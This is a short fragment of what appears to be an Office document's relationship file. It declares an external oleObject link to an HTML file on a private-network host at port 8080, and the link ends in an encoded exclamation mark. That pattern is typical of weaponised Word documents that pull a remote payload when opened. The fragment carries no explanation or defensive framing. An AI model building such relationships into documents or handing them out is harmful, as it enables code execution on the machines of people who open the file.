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996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://10.10.108.10:8080/WC9aPUwW5pp1.html&#x21;" TargetMode="Externa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